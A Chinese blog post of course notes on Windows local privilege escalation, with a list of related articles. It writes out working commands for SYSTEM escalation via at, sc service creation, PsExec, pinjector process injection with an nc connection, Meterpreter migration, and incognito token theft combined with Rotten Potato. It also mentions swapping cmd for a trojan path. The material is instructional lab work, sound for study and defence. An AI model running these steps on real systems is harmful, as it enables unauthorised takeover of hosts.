【权限提升】Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令

已于 2024-07-03 09:59:49 修改
阅读量849 收藏 1
点赞数 2
分类专栏: # 权限提升 文章标签: windows 网络安全
于 2023-02-20 18:12:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/129113253
版权
文章内容复现于小迪安全相关课程

Win本地用户-AT&SC&PS命令

利用Windows特性,权限继承

1、at命令提权的原理

at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用system权限。

适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除.

当我们拿到低权限的用户(webshell用户不能创建计划命令),通过连接上服务器后,可以通过at命令来进行本地提权。

提权命令:Test in Win2k3 系统级默认调用

at 21:00 /interactive cmd (在20:33分生成一个交互式的System权限的cmd)

2、sc命令

sc是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于控制面板中管理工具项中的服务。适用版本:windows 7、8、03、08、12、16

#创建一个名叫syscmd的新的交互式的cmd执行服务

sc Create syscmd binPath= "cmd /K start" type= own type= interact

#运行服务

sc start syscmd

win2k3下:

win server 2008下:

  1. PsTools 百度云链接

Telnet 等实用工具和远程控制程序(如 Symantec 的 PC Anywhere)允许你在远程系统上执行程序,但它们可能很难设置并要求你在想要访问的远程系统上安装客户端软件。 PsExec 是一种轻量级 telnet-replacement,可用于在其他系统上执行进程,为控制台应用程序提供完全交互性,而无需手动安装客户端软件。 PsExec 最强大的用途包括对远程系统和远程启用工具(如 IpConfig)启动交互式命令提示符,否则无法显示有关远程系统的信息。
注意:一些防病毒扫描程序报告一个或多个工具感染了“远程管理员”病毒。 PsTools 中没有含有病毒,但它们已被病毒使用,这就是为什么它们触发病毒通知的原因。

适用版本:Test in Win2012 and Win2008 & Win2016 其他未测 基本可以

PsTools - Sysinternals | Microsoft Learn

psexec.exe -accepteula -s -i -d cmd #调用运行cmd

win2016:

win10(非服务器版本):

版本一:

版本二:

服务器版本基本可以, PC个人电脑具体情况看win10上是否安装对应服务
实战情况下将cmd命令替换成后门路径,以system权限执行木马。

WIN本地用户-进程迁移注入获取 pinjector百度云链接

相当于开了一个后门,注入到其他用户进程下!

  1. Win2008以前版本 -Test in Win2k3-本地权限-本地虚拟机

部分进程默认system权限

pinjector -p 420 cmd 3333  #在PID= 进程下添加一个继承父进程权限的线程
nc 192.168.46.149 3333

2、MSF进程注入 本地权限-Win2008&2012&2016

ps //查看进程
migrate PID //迁移对应PID
将后门上线普通用户权限进程注入到system权限进程下

测试版本win server2016:

WIN本地用户-Web-令牌窃取&土豆

令牌窃取 Win2008 Win2012

假冒令牌可以假冒一个网络中的另一个用户进行各类操作。
所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。

  1. 本地权限 - win server2008&win 10

测试版本win server2008:

use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

经过后续测试2003 2012 2016都能提权成功

测试版本win10 个人PC

  1. Web权限 - Test in Win2008 12 16

webshell权限是不能直接进行令牌窃取的,配合烂土豆漏洞(ms16-075)
execute -cH -f ./potato.exe //配合烂土豆
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

测试版本win server2008

以webshell权限执行后门,即是IIS APPPOOL\asp access权限,且直接使用令牌窃取不能成功,需配合烂土豆漏洞

未配合烂土豆漏洞:

配合烂土豆漏洞:

An0nymouer
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
windows注入
WeinKee的博客
04-17 353
windows注入 本文内容引述至《windows核心编程》 注入引入需求: 从另一个进程创建的窗口派生子类窗口 需要一些方式来辅助调试,比如确定另一个进程正在使用哪些DLL 对另一个进程Hook 窗口派生 User32.dll被映射到进程A的地址空间中,负责对发到和发往进程A的任何窗口的消息进行接收和派发。当User32.dll检测到一个消息的时候,会先确定该窗口的WndProc的地址,然后...
第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
本文以“第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1”为主题,探讨了四种不同的提权策略,分别是通过数据库应用提权、Redis数据库权限提升、PostgreSQL数据库权限提升以及Windows系统的令牌窃取进程注入...
第101天:权限提升-Win 本地用户&进程注入&令牌窃取&AT&SC&PS 服务命令
最新发布
weixin_71529930的博客
06-05 613
原理是正常上传webshell只能获得web权限,无法提权到system,配合烂土豆,执行,溢出可以获得system权限。利用msf getsystem命令会自动帮你提权到system(在可以提权的条件下)利用工具注入的话,只能适用于2003版本,所以这里利用msf可以通杀。测试的时候发现如果利用该进程好像会把系统打蓝屏,谨慎使用。win2003以下的版本可以利用工具pinjector。个人主机win11,能否成功主要是看是否设置了uac。会弹出窗口进行请求,如果对方点击就能提权,不点就不行。
第101天:权限提升-Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令
qq_46081990的博客
06-22 254
【代码】第101天:权限提升-Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令
windows下的进程注入
12-21 111
。 转载于:https://www.cnblogs.com/beyond-Acm/p/4176687.html
权限提升--Windows本地用户
m0_65336233的博客
12-07 1250
Windows本地提权---AT&SC&PS&令牌窃取&进程注入&Bypass&UAC
windows进程注入
Armandhe的博客
07-21 328
水数量的,不过文章写的还是很牛皮,虽然有些我看不懂
第62天:权限提升-烂土豆&dll劫持&引号路径&服务权限1
08-03
如果服务的配置允许普通用户更改其路径或执行权限,攻击者可以上传恶意文件并修改服务配置,使得服务执行攻击者的代码,从而获得本地权限。利用accesschk.exe工具可以检查服务权限,并通过sc命令进行配置更改。 ...
cpp-Linux通过注入拥有sudo令牌进程进行权限提升
08-16
本文将深入探讨如何通过注入拥有sudo令牌进程来实现权限提升,以及如何防范这种攻击。 首先,让我们理解sudo的工作原理。sudo通过读取/etc/sudoers文件来确定哪些用户可以执行哪些命令,并且通常会要求用户提供...
易语言提升进程令牌模块
07-21
易语言提升进程令牌模块源码,提升进程令牌模块,AdjustProcessPrivilege,LookupPrivilegeValue,OpenProcessToken,AdjustTokenPrivileges,GetLastError
远程hook dll注入winlogin进程 system权限
04-20
远程hook dll注入winlogin进程 system权限
syscmdb:syscmdb系统
03-11
syscmdb Python3.6.2 Django1.11.1 paramiko2.4.2 syscmdb系统是一个框架式的WEB2.0开源的CMDB系统,仅用于测试使用。如果帮助到各位,请重新定义作者本人谢谢。 演示 项目展示地址: ://101.132.177.120账号root密码admin @ 123 功能 首页 总用户展示 总用户组展示 总资产主机展示 总异常连接资产展示 总业务线展示 主机刷新探测列表 系统用户 用户管理 创建用户(邮箱密码发送) 删除用户 更改用户 设置密码 设置权限 最高启用 用户组管理 创建用户组 更新用户组 设置权限 删除用户组 系统权限管理 创建权限 删除权限 资产管理 资产主机 添加服务器(自动探测服务器详情信息) 刷新探测 业务线设置 删除服务器 资产项目 创建业务线 业务线详情 设置业务主机 创建二级产品线 创建机器组 资产机房 创建ID
易语言进程权限提升及获取进程路径名
08-15
进程权限提升及获取进程路径名 系统结构:提升进程权限,列表,表项,取模块路径,Module32First,ExtractIconA,打开进程,获取线程,打开令牌,恢复权限,获取令牌特权,CreateToolhelp32Snapshot, ======窗口程
Windows权限提升令牌窃取、UAC提权、进程注入等提权
剁椒鱼头没剁椒的博客
03-27 3969
在之前的文章中已经对Windows权限提升进行了介绍,这里同样不再赘述,如果想要去了解Windows权限提升可以看以下的文章,同时也将Windows权限提升其它的几种办法也放在下面的文章中。同时本来应该还写一篇第三方全家提权的,但是在实际测试过程中发现,有些第三方提权,如果在电脑上都会自动更新,比如向日葵,低版本的直接无法连接向日葵官方的服务器,那么提个毛权限的啊。Windows权限提升—溢出提权Windows权限提升—MySQL数据库提权。
WIN进程注入&BypassUAC&令牌窃取
m0_62970186的博客
04-03 3573
文章目录WIN进程注入&BypassUAC&令牌窃取本地提权—win令牌窃取BypassUAC绕过提权什么是UAC?如何设置?BypassUAC提权?常见绕过项目?进程注入 WIN进程注入&BypassUAC&令牌窃取 本地提权—win令牌窃取 假冒令牌可以假冒一个网络中的另一个用户进行各类操作。 所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。 我这里用到了windowns2008虚拟机做演示 先用msf生成一个后门 msfvenom -p
windows注入的方法
清凝
11-22 763
本文总结了Windows常见的注入方式
权限提升-Win系统权限提升篇&计算机管理用户&进程注入&令牌窃取&服务启动&远程控制
siu~
03-25 741
1、计算机管理用户到System-入口点和应用点 2、计算机管理用户到System-服务启动&远程控制 3、计算机管理用户到System-进程注入&令牌窃取 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
windows权限提升——AT、SCPS命令提权
W小哥
11-25 5712
一、AT命令 适用范围: Windows2000、Windows 2003、Windows XP 1.1 AT命令简介 AT命令Windows XP中内置的命令,它也可以媲美Windows中的“计划任务”,而且在计划的安排、任务的管理、工作事务的处理方面,AT命令具有更强大更神通的功能。AT命令可在指定时间和日期、在指定计算机上运行命令和程序。 因为AT命令默认是以system权限下运行的所以我们可以利用以下命令,进行提权。 1.2 AT命令提权实验 系统:windows2003 命令: at 13:38
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值